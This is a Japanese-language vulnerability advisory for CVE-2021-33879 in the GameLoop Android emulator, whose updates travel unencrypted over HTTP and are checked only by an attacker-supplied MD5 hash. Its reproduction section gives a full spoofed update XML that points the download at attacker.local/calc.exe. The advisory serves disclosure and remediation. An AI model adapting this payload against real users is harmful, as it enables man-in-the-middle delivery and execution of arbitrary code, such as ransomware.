
GameLoop アップデート MITM
CVE ID: CVE-2021-33879
影響を受ける製品名とバージョン: GameLoop(4.1.21.90 より前のすべてのバージョン)
脆弱性タイプ: CWE-494: Download of Code Without Integrity Check
概要
GameLoop は Tencent によって開発された Android エミュレータです。この製品の更新メカニズムは暗号化も認証もされておらず(このエクスプロイトでは攻撃者が制御できる MD5 ハッシュを除く)、MITM の位置にいる攻撃者が、被害者のマシン上で実行される自身の更新パッケージを傍受・送信できるようになります。
説明
Tencent GameLoop は 4.1.21.90 より前のバージョンで、安全でない HTTP 接続を介して更新をダウンロードしていました。MITM の位置にいる悪意のある攻撃者は、更新パッケージを記述する XML 文書の内容を偽装し、ダウンロード URL を任意の Windows 実行ファイルを指す URL に置き換えることができました。唯一の整合性チェックが、ダウンロードしたファイルの MD5 チェックサムと XML 文書内の MD5 チェックサムとの比較だけだったため、ダウンロードされた実行ファイルが被害者のマシン上で実行されていました。
再現手順
<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
<GlobalConfig>
<Item name="UpdateEnable" Value="1" />
</GlobalConfig>
<UpdatePolicy>
<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
<Condition Method="Or">
<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
</Condition>
</PolicyItem>
</UpdatePolicy>
<UpdateOperation>
<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
</OperItem>
</UpdateOperation>
</UpdateConfig>


対策
GameLoop の新しいバージョンをインストールしてください。